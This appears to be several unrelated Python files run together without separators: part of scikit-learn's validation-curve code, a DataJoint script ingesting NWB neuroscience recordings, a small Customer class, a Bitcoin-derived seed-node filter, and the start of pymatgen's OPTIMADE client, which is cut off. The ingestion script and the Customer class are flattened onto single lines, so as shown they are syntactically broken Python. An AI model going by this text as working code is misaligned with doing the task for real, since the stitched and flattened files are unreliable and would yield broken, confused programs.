        Number of jobs to run in parallel. Training the estimator and
        computing the score are parallelized over the combinations of each
        parameter value and each cross-validation split. ``None`` means 1
        unless in a :obj:`joblib.parallel_backend` context. ``-1`` means
        using all processors. See :term:`Glossary <n_jobs>` for more details.

    pre_dispatch : int or str, default='all'
        Number of predispatched jobs for parallel execution (default is
        all). The option can reduce the allocated memory. The str can
        be an expression like '2*n_jobs'.

    verbose : int, default=0
        Controls the verbosity: the higher, the more messages.

    fit_params : dict, default=None
        Parameters to pass to the fit method of the estimator.

        .. versionadded:: 0.24

    error_score : 'raise' or numeric, default=np.nan
        Value to assign to the score if an error occurs in estimator fitting.
        If set to 'raise', the error is raised.
        If a numeric value is given, FitFailedWarning is raised.

        .. versionadded:: 0.20

    Returns
    -------
    train_scores : array of shape (n_ticks, n_cv_folds)
        Scores on training sets.

    test_scores : array of shape (n_ticks, n_cv_folds)
        Scores on test set.

    Notes
    -----
    See :ref:`sphx_glr_auto_examples_model_selection_plot_validation_curve.py`
    """
    X, y, groups = indexable(X, y, groups)

    cv = check_cv(cv, y, classifier=is_classifier(estimator))
    scorer = check_scoring(estimator, scoring=scoring)

    parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch,
                        verbose=verbose)
    results = parallel(delayed(_fit_and_score)(
        clone(estimator), X, y, scorer, train, test, verbose,
        parameters={param_name: v}, fit_params=fit_params,
        return_train_score=True, error_score=error_score)

        # NOTE do not change order of iteration to allow one time cv splitters
        for train, test in cv.split(X, y, groups) for v in param_range)
    n_params = len(param_range)

    results = _aggregate_score_dicts(results)
    train_scores = results["train_scores"].reshape(-1, n_params).T
    test_scores = results["test_scores"].reshape(-1, n_params).T

    return train_scores, test_scores


def _aggregate_score_dicts(scores):
    """Aggregate a list of dicts into a dict of np ndarrays.

    The input is a flat list of dicts, one per evaluation, of the form

        [{'prec': 0.1, 'acc': 1.0}, {'prec': 0.1, 'acc': 1.0}, ...]

    and it is converted to a single dict of arrays

        {'prec': np.array([0.1, ...]), 'acc': np.array([1.0, ...])}

    Parameters
    ----------
    scores : list of dict
        List of dicts of the scores for all scorers. This is a flat list,
        assumed originally to be of row major order.

    Examples
    --------
    >>> scores = [{'a': 1, 'b': 10}, {'a': 2, 'b': 2}, {'a': 3, 'b': 3},
    ...           {'a': 10, 'b': 10}]                         # doctest: +SKIP
    >>> _aggregate_score_dicts(scores)                        # doctest: +SKIP
    {'a': array([1, 2, 3, 10]), 'b': array([10, 2, 3, 10])}
    """
    return {
        key: np.asarray([score[key] for score in scores])
        if isinstance(scores[0][key], (numbers.Number, np.ndarray))
        else [score[key] for score in scores]
        for key in scores[0]
    }
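
# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the module above): it exercises the three
# public entry points documented here -- permutation_test_score,
# learning_curve and validation_curve -- through scikit-learn's public API.
# The dataset and estimator choices (load_iris, SVC) are illustrative
# assumptions, not something mandated by the code above.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    from sklearn.datasets import load_iris
    from sklearn.model_selection import (learning_curve,
                                         permutation_test_score,
                                         validation_curve)
    from sklearn.svm import SVC

    X_demo, y_demo = load_iris(return_X_y=True)
    est = SVC(kernel="linear")

    # Significance of the cross-validated score under label permutation;
    # the smallest attainable p-value is 1 / (n_permutations + 1).
    score, perm_scores, pvalue = permutation_test_score(
        est, X_demo, y_demo, n_permutations=100, random_state=0)

    # Learning curve over the default 5 relative training-set sizes.
    sizes, train_scores, test_scores = learning_curve(
        est, X_demo, y_demo, cv=5)

    # Validation curve over a single hyper-parameter (here SVC's C);
    # param_name and param_range are keyword-only, as in the signature above.
    vc_train, vc_test = validation_curve(
        est, X_demo, y_demo, param_name="C",
        param_range=[0.1, 1.0, 10.0], cv=5)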
import os import re import pathlib import h5py as h5 import numpy as np from decimal import Decimal from tqdm import tqdm import glob import datajoint as dj from pipeline import (reference, subject, acquisition, intracellular, behavior, stimulation, virus, utilities) path = pathlib.Path(dj.config['custom'].get('data_directory')).as_posix() fnames = np.hstack(glob.glob(os.path.join(dir_files[0], '*.nwb')) if len(dir_files[1]) == 0 and dir_files[0].find('VPM_silicon_probe') == -1 else [] for dir_files in os.walk(path)) for fname in fnames: print(f'Reading {fname}...') nwb = h5.File(fname, 'r') subject_info = {c: nwb['general']['subject'][c].value.decode('UTF-8') for c in ('subject_id', 'description', 'sex', 'species', 'weight', 'age', 'genotype')} # force subject_id to be lower-case for consistency subject_info['subject_id'] = subject_info['subject_id'].lower() # dob and sex subject_info['sex'] = subject_info['sex'][0].upper() dob_str = re.search('(?<=Date of birth:\s)(.*)', subject_info['description']) if utilities.parse_date(dob_str.group()) is not None: subject_info['date_of_birth'] = utilities.parse_date(dob_str.group()) # allele allele_str = re.search('(?<=Animal Strain:\s)(.*)', subject_info['description']).group() # extract the information related to animal allele allele_dict = {alias.lower(): allele for alias, allele in subject.AlleleAlias.fetch()} regex_str = '|'.join([re.escape(alias) for alias in allele_dict.keys()]) alleles = [allele_dict[s.lower()] for s in re.findall(regex_str, allele_str, re.I)] # source source_str = re.search('(?<=Animal source:\s)(.*)', subject_info['description']).group() # extract the information related to animal allele source_dict = {alias.lower(): source for alias, source in reference.AnimalSourceAlias.fetch()} regex_str = '|'.join([re.escape(alias) for alias in source_dict.keys()]) subject_info['animal_source'] = source_dict[re.search(regex_str, source_str, re.I).group().lower()] if re.search(regex_str, source_str, re.I) else 'N/A' with subject.Subject.connection.transaction: if subject_info not in subject.Subject.proj(): subject.Subject.insert1(subject_info, ignore_extra_fields = True) subject.Subject.Allele.insert((dict(subject_info, allele = k) for k in alleles), ignore_extra_fields = True) # ==================== session ==================== # -- session_time session_info = dict(subject_info, session_id=os.path.split(fname)[-1].replace('.nwb', ''), experiment_description=nwb['general']['experiment_description'].value.decode('UTF-8'), institution=nwb['general']['institution'].value.decode('UTF-8'), related_publications=nwb['general']['related_publications'].value.decode('UTF-8'), surgery=nwb['general']['surgery'].value.decode('UTF-8'), lab=nwb['general']['lab'].value.decode('UTF-8'), notes=nwb['general']['notes'].value.decode('UTF-8'), identifier=nwb['identifier'].value.decode('UTF-8'), session_note=nwb['session_description'].value.decode('UTF-8'), session_time=utilities.parse_date(nwb['general']['session_id'].value.decode('UTF-8'))) experimenters = nwb['general']['experimenter'].value.decode('UTF-8') experiment_types = re.split('Experiment type: ', session_info['notes'])[-1] experiment_types = re.split(',\s?', experiment_types) session_info['session_note'] = session_info.pop('session_note') + '; ' + session_info.pop('experiment_description') # experimenter and experiment type (possible multiple experimenters or types) experimenters = [experimenters] if np.array( experimenters).size <= 1 else experimenters # in case there's only 1 experimenter 
reference.Experimenter.insert(zip(experimenters), skip_duplicates = True) acquisition.ExperimentType.insert(zip(experiment_types), skip_duplicates=True) sess_key = {'subject_id': subject_info["subject_id"], 'session_time': session_info["session_time"], 'session_id': session_info['session_id']} with acquisition.Session.connection.transaction: if session_info not in acquisition.Session.proj(): acquisition.Session.insert1(session_info, ignore_extra_fields=True) acquisition.Session.Experimenter.insert((dict(session_info, experimenter=k) for k in experimenters), ignore_extra_fields=True) acquisition.Session.ExperimentType.insert((dict(session_info, experiment_type=k) for k in experiment_types), ignore_extra_fields=True) print(f'\nCreating Session - Subject: {subject_info["subject_id"]} - Date: {session_info["session_time"]}') # ==================== Intracellular ==================== # -- read data - intracellular_ephys ephys_name = list(nwb['general']['intracellular_ephys'])[0] ie_info = {c: nwb['general']['intracellular_ephys'][ephys_name][c].value.decode('UTF-8') for c in nwb['general']['intracellular_ephys'][ephys_name]} coord_ap_ml_dv = re.findall('\d+.\d+', ie_info['location']) hemisphere = 'left' # hardcoded here brain_location = {'brain_region': 'barrel cortex', # hardcoded here 'brain_subregion': 'N/A', 'cortical_layer': re.search('(?<=L)(\d)', session_info['session_note']).group(), 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates = True) # -- ActionLocation action_location = dict(brain_location, coordinate_ref='bregma', # hardcoded here coordinate_ap=round(Decimal(coord_ap_ml_dv[0]), 2), coordinate_ml=round(Decimal(coord_ap_ml_dv[1]), 2), coordinate_dv=round(Decimal(coord_ap_ml_dv[2]) * Decimal('1e-3'), 2)) reference.ActionLocation.insert1(action_location, skip_duplicates = True) # -- Whole Cell Device reference.WholeCellDevice.insert1({'device_name': ie_info['device']}, skip_duplicates=True) # -- Cell - there should only be 1 unit for whole-cell recording unit = nwb['processing']['spike_times']['UnitTimes']['unit_list'].value[0].decode('UTF-8') unit_desc = nwb['processing']['spike_times']['UnitTimes'][unit]['unit_description'].value.decode('UTF-8') cell_key = dict({**sess_key, **action_location}, cell_type = re.search('|'.join(intracellular.CellType.fetch('cell_type')), unit_desc, re.I).group(), device_name = ie_info['device']) # determine if it is 'membrane_potential' or 'juxta_potential' for f in nwb['acquisition']['timeseries']: if re.search('potential', f): Vm_field = f break with intracellular.Cell.connection.transaction: if cell_key not in intracellular.Cell.proj(): intracellular.Cell.insert1(cell_key, ignore_extra_fields=True) intracellular.MembranePotential.insert1(dict( cell_key, membrane_potential=nwb['acquisition']['timeseries'][Vm_field]['data'].value, membrane_potential_timestamps=nwb['acquisition']['timeseries'][Vm_field]['timestamps'].value), ignore_extra_fields=True, allow_direct_insert=True, skip_duplicates=True) intracellular.CurrentInjection.insert1(dict( cell_key, current_injection=nwb['acquisition']['timeseries']['current']['data'].value, current_injection_timestamps=nwb['acquisition']['timeseries']['current']['timestamps'].value), ignore_extra_fields = True, allow_direct_insert = True, skip_duplicates=True) intracellular.UnitSpikeTimes.insert1(dict( cell_key, unit_id=int(re.search('\d+', unit).group()), spike_times=nwb['processing']['spike_times']['UnitTimes'][unit]['times'].value), ignore_extra_fields = True, 
allow_direct_insert = True, skip_duplicates=True) print('Ingest intracellular data') else: print(f'Cell exists: {fname}') # ==================== Behavior ==================== behavior.LickTrace.insert1(dict( sess_key, lick_trace=nwb['acquisition']['timeseries']['lick_trace']['data'].value, lick_trace_timestamps=nwb['acquisition']['timeseries']['lick_trace']['timestamps'].value), skip_duplicates=True, allow_direct_insert=True) principal_whisker, principal_whisker_num = nwb['analysis']['principal_whisker'].value[0].decode('UTF-8'), '1' whisker_timeseries = nwb['processing']['whisker']['BehavioralTimeSeries'] whisker_configs = ([wk.decode('UTF-8') for wk in nwb["general"]["whisker_configuration"].value] if nwb["general"]["whisker_configuration"].value.shape else [wk for wk in nwb["general"]["whisker_configuration"].value.decode('UTF-8').split(',')]) print(f'Whiskers: {whisker_configs} - Principal: {principal_whisker}') for whisker_config, whisker_num in zip(whisker_configs, set([re.search('\d', k).group() for k in whisker_timeseries])): whisker_key = dict(sess_key, whisker_config=whisker_config) principal_whisker_num = whisker_num if whisker_config == principal_whisker else principal_whisker_num if whisker_key not in behavior.Whisker.proj(): # ---- Extract behavior time-series and recondition b_tvec = whisker_timeseries['touch_onset_' + whisker_num]['timestamps'].value * 1e-3 # convert msec->second diff_btvec = np.diff(b_tvec) tr_break_idx = np.where(diff_btvec > 1)[0] tr_break_idx = tr_break_idx + 1 tr_break_idx = np.concatenate([[0], tr_break_idx, [len(b_tvec)]]) behavior_timestamps = np.hstack([(b_tvec[start:end] - b_tvec[start]) * 1e3 + b_tvec[start] for start, end in zip(tr_break_idx[:-1], tr_break_idx[1:])]) behavior.Whisker.insert1(dict( whisker_key, principal_whisker=(whisker_config == principal_whisker), distance_to_pole=whisker_timeseries['distance_to_pole_' + whisker_num]['data'].value.flatten(), touch_offset=whisker_timeseries['touch_offset_' + whisker_num]['data'].value.flatten(), touch_onset=whisker_timeseries['touch_onset_' + whisker_num]['data'].value.flatten(), whisker_angle=whisker_timeseries['whisker_angle_' + whisker_num]['data'].value.flatten(), whisker_curvature=whisker_timeseries['whisker_curvature_' + whisker_num]['data'].value.flatten(), behavior_timestamps= behavior_timestamps), skip_duplicates=True, allow_direct_insert=True) print(f'Ingest whisker data: {whisker_config} - Principal: {whisker_config == principal_whisker}') # ==================== Trials ==================== trial_resp_options = [k.decode('UTF-8') for k in nwb['analysis']['trial_type_string'].value.flatten()][:-1] # -- read trial-related info -- nwb['epochs'], nwb['analysis'], nwb['stimulus']['presentation']) trials = dict(trial_names=[tr for tr in nwb['epochs']], trial_type=[v['description'].value.decode('UTF-8') for v in nwb['epochs'].values()], start_times=[v['start_time'].value for v in nwb['epochs'].values()], stop_times=[v['stop_time'].value for v in nwb['epochs'].values()], good_trials=nwb['analysis']['good_trials'].value, trial_response=nwb['analysis']['trial_type_mat'].value, pole_pos_time=nwb['stimulus']['presentation']['pole_pos']['timestamps'].value, pole_pos=nwb['stimulus']['presentation']['pole_pos']['data'].value, pole_in_times=nwb['stimulus']['presentation']['pole_in']['timestamps'].value, pole_out_times=nwb['stimulus']['presentation']['pole_out']['timestamps'].value) lick_times = (nwb['acquisition']['timeseries']['lick_trace']['data'].value * 
(nwb['acquisition']['timeseries']['lick_trace']['timestamps'].value)) lick_times = lick_times[lick_times != 0] touch_times = (nwb['processing']['whisker']['BehavioralTimeSeries']['touch_onset_' + principal_whisker_num]['data'].value.flatten() * nwb['processing']['whisker']['BehavioralTimeSeries']['touch_onset_' + principal_whisker_num]['timestamps'].value.flatten()) touch_times = touch_times[touch_times != 0] * 1e-3 # convert ms -> s (behav data timestamps are in millisecond) # form new key-values pair and insert key trial_set = dict(sess_key, trial_counts=len(trials['trial_names'])) if trial_set not in acquisition.TrialSet.proj(): print(f'Ingest trial information\n') acquisition.TrialSet.insert1(trial_set, allow_direct_insert=True) for idx, trial_id in tqdm(enumerate(trials['trial_names'])): trial_key = dict(trial_set, trial_id=int(re.search('\d+', trial_id).group())) trial_detail = dict(start_time=trials['start_times'][idx], stop_time=trials['stop_times'][idx], trial_is_good=True if trials['good_trials'].flatten()[idx] == 1 else False, trial_type=re.match('Go|Nogo', trials['trial_type'][idx]).group(), trial_stim_present=True if trials['trial_response'][idx, -1] == 1 else False, trial_response=trial_resp_options[np.where(trials['trial_response'][idx, :-1])[0][0]], pole_position=trials['pole_pos'][idx]) # insert acquisition.TrialSet.Trial.insert1({**trial_key, **trial_detail}, ignore_extra_fields=True, skip_duplicates=True, allow_direct_insert=True) # ======== Now add trial event timing to the EventTime part table ==== # -- events timing trial_lick_times = lick_times[np.logical_and(lick_times > trial_detail['start_time'], lick_times < trial_detail['stop_time'])] trial_touch_times = touch_times[np.logical_and(touch_times > trial_detail['start_time'], touch_times < trial_detail['stop_time'])] events = dict(trial_start=0, trial_stop=trial_detail['stop_time'] - trial_detail['start_time'], pole_in=trials['pole_in_times'][idx] - trial_detail['start_time'], pole_out=trials['pole_out_times'][idx] - trial_detail['start_time'], pole_pos=trials['pole_pos_time'][idx] - trial_detail['start_time'], first_lick=trial_lick_times[0] - trial_detail['start_time'] if trial_lick_times.size else np.nan, first_touch=trial_touch_times[0] - trial_detail['start_time'] if trial_touch_times.size else np.nan) acquisition.TrialSet.EventTime.insert((dict(trial_key, trial_event=k, event_time=v) for k, v in events.items()), ignore_extra_fields=True, allow_direct_insert=True) stimulation.TrialPhotoStimParam.insert1(dict(trial_key, photo_stim_mode='_'.join( trials['trial_type'][idx].split('_')[1:])), ignore_extra_fields=True, allow_direct_insert=True) # ==================== Photo stimulation ==================== if 'optogenetics' in nwb['general']: for site in nwb['general']['optogenetics']: opto_descs = nwb['general']['optogenetics'][site]['description'].value.decode('UTF-8') opto_excitation_lambda = (re.search("\d+", nwb['general']['optogenetics'][site]['excitation_lambda'] .value.decode('UTF-8')).group()) splittedstr = re.split(',\s?coordinates:\s?', nwb['general']['optogenetics'][site]['location'].value.decode('UTF-8')) brain_region = splittedstr[0] coord_ap_ml_dv = re.findall('\d+\.\d+', splittedstr[-1]) # -- BrainLocation brain_location = {'brain_region': brain_region, 'brain_subregion': 'N/A', 'cortical_layer': 'N/A', 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates=True) # -- ActionLocation action_location = dict(brain_location, coordinate_ref = 'bregma', coordinate_ap = 
round(Decimal(coord_ap_ml_dv[0]), 2), coordinate_ml = round(Decimal(coord_ap_ml_dv[1]), 2), coordinate_dv = round(Decimal(coord_ap_ml_dv[2]), 2)) reference.ActionLocation.insert1(action_location, skip_duplicates=True) # -- Device stim_device = nwb['general']['optogenetics'][site]['device'].value.decode('UTF-8') stimulation.PhotoStimDevice.insert1({'device_name': stim_device}, skip_duplicates=True) # -- PhotoStimulationProtocol photim_stim_protocol = dict(protocol=re.search('\d+', site).group(), device_name=stim_device, photo_stim_method='laser', photo_stim_excitation_lambda=float(opto_excitation_lambda), photo_stim_notes=(f'{site} - {opto_descs}')) stimulation.PhotoStimProtocol.insert1(photim_stim_protocol, skip_duplicates=True) # -- PhotoStimulation stim_presentation = None for f in nwb['stimulus']['presentation']: if ('site' in nwb['stimulus']['presentation'][f] and nwb['stimulus']['presentation'][f]['site'].value.decode('UTF-8') == site): stim_presentation = nwb['stimulus']['presentation'][f] break if stim_presentation and dict({**subject_info, **session_info}, photostim_id=site) not in stimulation.PhotoStimulation.proj(): photostim_data = stim_presentation['data'].value photostim_timestamps = stim_presentation['timestamps'].value stimulation.PhotoStimulation.insert1(dict({**session_info, **photim_stim_protocol, **action_location}, photostim_id=site, photostim_timeseries=photostim_data, photostim_timestamps=photostim_timestamps), ignore_extra_fields = True) print(f'Ingest photostim: {site}') # ==================== Virus ==================== virus_desc_pattern = re.compile(r'virusSource: (?P<virus_source>.*); virusID: (?P<virus_id>.*); virusLotNumber: (?P<virus_lot_num>.*); inflectionCoordinates: (?P<injection_coord>.*); infectionLocation: (?P<injection_loc>.*); virusTiter: (?P<virus_titer>.*); injectionVolume: (?P<injection_volume>.*); injectionDate: (?P<injection_date>.*);(.+)') match = virus_desc_pattern.match(nwb['general']['virus'].value.decode('UTF-8')) if match and match['virus_id']: virus_info = dict( virus_source=match['virus_source'], virus=match['virus_id'], virus_lot_number=match['virus_lot_num'], virus_titer=float(match['virus_titer'])) virus.Virus.insert1(virus_info, skip_duplicates=True) brain_location = {'brain_region': match['injection_loc'], 'brain_subregion': match['injection_coord'].split(' ')[0], 'cortical_layer': 'N/A', 'hemisphere': hemisphere} reference.BrainLocation.insert1(brain_location, skip_duplicates=True) virus.VirusInjection.insert1(dict({**virus_info, **subject_info, **brain_location}, coordinate_ref='bregma', injection_date=utilities.parse_date( re.search('(\d{4})-(\d{2})-(\d{2})', match['injection_date']).group()), injection_volume=round(Decimal(re.match('\d+', match['injection_volume']).group()), 2)), ignore_extra_fields=True, skip_duplicates=True) print('Ingest virus injection')
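
# ---------------------------------------------------------------------------
# Hedged sketch (not part of the ingestion script above): the whisker-trace
# "reconditioning" step splits one long timestamp vector into trials by
# finding gaps larger than 1 second between consecutive samples (the
# tr_break_idx computation). The helper and toy vector below are assumptions
# made up for illustration.
# ---------------------------------------------------------------------------
import numpy as np


def split_on_gaps(tvec, gap=1.0):
    """Return per-trial segments of `tvec`, split wherever the spacing
    between consecutive samples exceeds `gap` seconds."""
    breaks = np.where(np.diff(tvec) > gap)[0] + 1          # first index of each new trial
    edges = np.concatenate([[0], breaks, [len(tvec)]])     # segment boundaries
    return [tvec[s:e] for s, e in zip(edges[:-1], edges[1:])]


if __name__ == "__main__":
    t = np.array([0.0, 0.1, 0.2, 5.0, 5.1, 9.0])  # two gaps > 1 s -> 3 trials
    print(split_on_gaps(t))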
class Customer: def __init__(self, name, age, id): self.name = name self.age = age self.id = id self.rented_dvds = [] def __repr__(self): result = f"{self.id}: {self.name} of age {self.age}" \ f" has {len(self.rented_dvds)} rented DVD's ({', '.join([x.name for x in self.rented_dvds])})" return result
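
# ---------------------------------------------------------------------------
# Hedged usage sketch: __repr__ above expects each rented item to expose a
# .name attribute. The DVD stand-in below is a hypothetical placeholder
# invented for illustration; the real DVD class is defined elsewhere.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    from collections import namedtuple

    DVD = namedtuple("DVD", ["name"])  # hypothetical stand-in
    c = Customer("Ada", 30, 1)
    c.rented_dvds.append(DVD("Blade Runner"))
    print(c)  # -> 1: Ada of age 30 has 1 rented DVD's (Blade Runner)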
#!/usr/bin/env python3
# Copyright (c) 2013-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#

import re
import sys
import dns.resolver
import collections
from typing import List, Dict, Union

NSEEDS=512

MAX_SEEDS_PER_ASN = {
    'ipv4': 2,
    'ipv6': 10,
}

MIN_BLOCKS = 153500

PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([a-z2-7]{56}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(
    r"^/Satoshi:("
    r"0.14.(0|1|2|3|99)|"
    r"0.15.(0|1|2|99)|"
    r"0.16.(0|1|2|3|99)|"
    r"0.17.(0|0.1|1|2|99)|"
    r"0.18.(0|1|99)|"
    r"0.19.(0|1|2|99)|"
    r"0.20.(0|1|2|99)|"
    r"0.21.(0|1|2|99)|"
    r"22.(0|99)|"
    r"23.99"
    r")")

def parseline(line: str) -> Union[dict, None]:
    """ Parses a line from `seeds_main.txt` into a dictionary of details for that line,
    or `None` if the line could not be parsed.
    """
    sline = line.split()
    if len(sline) < 12:
        # line too short to be valid, skip it.
        return None
    m = PATTERN_IPV4.match(sline[0])
    sortkey = None
    ip = None
    if m is None:
        m = PATTERN_IPV6.match(sline[0])
        if m is None:
            m = PATTERN_ONION.match(sline[0])
            if m is None:
                return None
            else:
                net = 'onion'
                ipstr = sortkey = m.group(1)
                port = int(m.group(2))
        else:
            net = 'ipv6'
            if m.group(1) in ['::']: # Not interested in localhost
                return None
            ipstr = m.group(1)
            sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
            port = int(m.group(2))
    else:
        # Do IPv4 sanity check
        ip = 0
        for i in range(0,4):
            if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
                return None
            ip = ip + (int(m.group(i+2)) << (8*(3-i)))
        if ip == 0:
            return None
        net = 'ipv4'
        sortkey = ip
        ipstr = m.group(1)
        port = int(m.group(6))

    # Skip bad results.
    if int(sline[1]) == 0:
        return None

    # Extract uptime %.
    uptime30 = float(sline[7][:-1])
    # Extract Unix timestamp of last success.
    lastsuccess = int(sline[2])
    # Extract protocol version.
    version = int(sline[10])
    # Extract user agent.
    agent = sline[11][1:-1]
    # Extract service flags.
    service = int(sline[9], 16)
    # Extract blocks.
    blocks = int(sline[8])
    # Construct result.
    return {
        'net': net,
        'ip': ipstr,
        'port': port,
        'ipnum': ip,
        'uptime': uptime30,
        'lastsuccess': lastsuccess,
        'version': version,
        'agent': agent,
        'service': service,
        'blocks': blocks,
        'sortkey': sortkey,
    }

def dedup(ips: List[Dict]) -> List[Dict]:
    """ Remove duplicates from `ips` where multiple ips share address and port. """
    d = {}
    for ip in ips:
        d[ip['ip'],ip['port']] = ip
    return list(d.values())

def filtermultiport(ips: List[Dict]) -> List[Dict]:
    """ Filter out hosts with more than one node per IP address. """
    hist = collections.defaultdict(list)
    for ip in ips:
        hist[ip['sortkey']].append(ip)
    return [value[0] for (key,value) in list(hist.items()) if len(value)==1]

def lookup_asn(net: str, ip: str) -> Union[int, None]:
    """ Look up the asn for an `ip` address by querying cymru.com
    on network `net` (e.g. ipv4 or ipv6).

    Returns an integer ASN or None if it could not be found.
    """
    try:
        if net == 'ipv4':
            ipaddr = ip
            prefix = '.origin'
        else: # http://www.team-cymru.com/IP-ASN-mapping.html
            res = str() # 2001:4860:b002:23::68
            for nb in ip.split(':')[:4]: # pick the first 4 nibbles
                for c in nb.zfill(4): # right padded with '0'
                    res += c + '.' # 2001 4860 b002 0023
            ipaddr = res.rstrip('.') # 2.0.0.1.4.8.6.0.b.0.0.2.0.0.2.3
            prefix = '.origin6'

        asn = int([x.to_text() for x in dns.resolver.resolve('.'.join(
                   reversed(ipaddr.split('.'))) + prefix + '.asn.cymru.com',
                   'TXT').response.answer][0].split('\"')[1].split(' ')[0])
        return asn
    except Exception as e:
        sys.stderr.write(f'ERR: Could not resolve ASN for "{ip}": {e}\n')
        return None

# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips: List[Dict], max_per_asn: Dict, max_per_net: int) -> List[Dict]:
    """ Prunes `ips` by
    (a) trimming ips to have at most `max_per_net` ips from each net (e.g. ipv4, ipv6);
    and (b) trimming ips to have at most `max_per_asn` ips from each asn in each net.
    """
    # Sift out ips by type
    ips_ipv46 = [ip for ip in ips if ip['net'] in ['ipv4', 'ipv6']]
    ips_onion = [ip for ip in ips if ip['net'] == 'onion']

    # Filter IPv46 by ASN, and limit to max_per_net per network
    result = []
    net_count: Dict[str, int] = collections.defaultdict(int)
    asn_count: Dict[int, int] = collections.defaultdict(int)
    for i, ip in enumerate(ips_ipv46):
        if i % 10 == 0:
            # give progress update
            print(f"{i:6d}/{len(ips_ipv46)} [{100*i/len(ips_ipv46):04.1f}%]\r", file=sys.stderr, end='', flush=True)
        if net_count[ip['net']] == max_per_net:
            # do not add this ip as we already have too many
            # ips from this network
            continue
        asn = lookup_asn(ip['net'], ip['ip'])
        if asn is None or asn_count[asn] == max_per_asn[ip['net']]:
            # do not add this ip as we already have too many
            # ips from this ASN on this network
            continue
        asn_count[asn] += 1
        net_count[ip['net']] += 1
        result.append(ip)

    # Add back Onions (up to max_per_net)
    result.extend(ips_onion[0:max_per_net])
    return result

def ip_stats(ips: List[Dict]) -> str:
    """ Format and return pretty string from `ips`. """
    hist: Dict[str, int] = collections.defaultdict(int)
    for ip in ips:
        if ip is not None:
            hist[ip['net']] += 1
    return f"{hist['ipv4']:6d} {hist['ipv6']:6d} {hist['onion']:6d}"

def main():
    lines = sys.stdin.readlines()
    ips = [parseline(line) for line in lines]

    print('\x1b[7m  IPv4   IPv6  Onion Pass \x1b[0m', file=sys.stderr)
    print(f'{ip_stats(ips):s} Initial', file=sys.stderr)
    # Skip entries with invalid address.
    ips = [ip for ip in ips if ip is not None]
    print(f'{ip_stats(ips):s} Skip entries with invalid address', file=sys.stderr)
    # Skip duplicates (in case multiple seeds files were concatenated)
    ips = dedup(ips)
    print(f'{ip_stats(ips):s} After removing duplicates', file=sys.stderr)
    # Enforce minimal number of blocks.
    ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
    print(f'{ip_stats(ips):s} Enforce minimal number of blocks', file=sys.stderr)
    # Require service bit 1.
    ips = [ip for ip in ips if (ip['service'] & 1) == 1]
    print(f'{ip_stats(ips):s} Require service bit 1', file=sys.stderr)
    # Require at least 50% 30-day uptime for clearnet, 10% for onion.
    req_uptime = {
        'ipv4': 50,
        'ipv6': 50,
        'onion': 10,
    }
    ips = [ip for ip in ips if ip['uptime'] > req_uptime[ip['net']]]
    print(f'{ip_stats(ips):s} Require minimum uptime', file=sys.stderr)
    # Require a known and recent user agent.
    ips = [ip for ip in ips if PATTERN_AGENT.match(ip['agent'])]
    print(f'{ip_stats(ips):s} Require a known and recent user agent', file=sys.stderr)
    # Sort by availability (and use last success as tie breaker)
    ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
    # Filter out hosts with multiple umkoin ports, these are likely abusive
    ips = filtermultiport(ips)
    print(f'{ip_stats(ips):s} Filter out hosts with multiple umkoin ports', file=sys.stderr)
    # Look up ASNs and limit results, both per ASN and globally.
    ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
    print(f'{ip_stats(ips):s} Look up ASNs and limit results per ASN and per net', file=sys.stderr)
    # Sort the results by IP address (for deterministic output).
    ips.sort(key=lambda x: (x['net'], x['sortkey']))

    for ip in ips:
        if ip['net'] == 'ipv6':
            print('[%s]:%i' % (ip['ip'], ip['port']))
        else:
            print('%s:%i' % (ip['ip'], ip['port']))

if __name__ == '__main__':
    main()
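The script above is driven entirely through stdin and stdout (a seeder dump is piped in and the filtered node list is printed out). As a sketch of the input parseline expects, here is a hypothetical seeder row; every column value is made up, chosen only to satisfy the indices the parser reads (address, good flag, last-success timestamp, uptime percentage, block height, service bits, protocol version, quoted user agent):

# Hypothetical row; only columns 0-2 and 7-11 are read by parseline().
row = '1.2.3.4:8333 1 1640000000 0 0 0 0 100.00% 700000 00000409 70016 "/Satoshi:0.21.0/"'
entry = parseline(row)
assert entry is not None and entry['net'] == 'ipv4' and entry['port'] == 8333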
""" Optimade support. """ import logging import sys from collections import namedtuple from os.path import join from typing import Dict, Union, List, Optional from urllib.parse import urlparse import requests #from retrying import retry from pymatgen.core.periodic_table import DummySpecies from pymatgen.core.structure import Structure from pymatgen.util.provenance import StructureNL from pymatgen.util.sequence import PBar # TODO: importing optimade-python-tool's data structures will make more sense Provider = namedtuple("Provider", ["name", "base_url", "description", "homepage", "prefix"]) _logger = logging.getLogger(__name__) _handler = logging.StreamHandler(sys.stdout) _logger.addHandler(_handler) _logger.setLevel(logging.WARNING) class OptimadeRester: """ Class to call OPTIMADE-compliant APIs, see optimade.org This class is ready to use but considered in-development and subject to change until the OPTIMADE paper is published. """ # regenerate on-demand from official providers.json using OptimadeRester.refresh_aliases() # these aliases are provided as a convenient shortcut for users of the OptimadeRester class aliases = { "aflow": "http://aflow.org/API/optimade/", "cod": "https://www.crystallography.net/cod/optimade", "mcloud.2dstructures": "https://aiida.materialscloud.org/2dstructures/optimade", "mcloud.2dtopo": "https://aiida.materialscloud.org/2dtopo/optimade", "mcloud.curated-cofs": "https://aiida.materialscloud.org/curated-cofs/optimade", "mcloud.li-ion-conductors": "https://aiida.materialscloud.org/li-ion-conductors/optimade", "mcloud.optimade-sample": "https://aiida.materialscloud.org/optimade-sample/optimade", 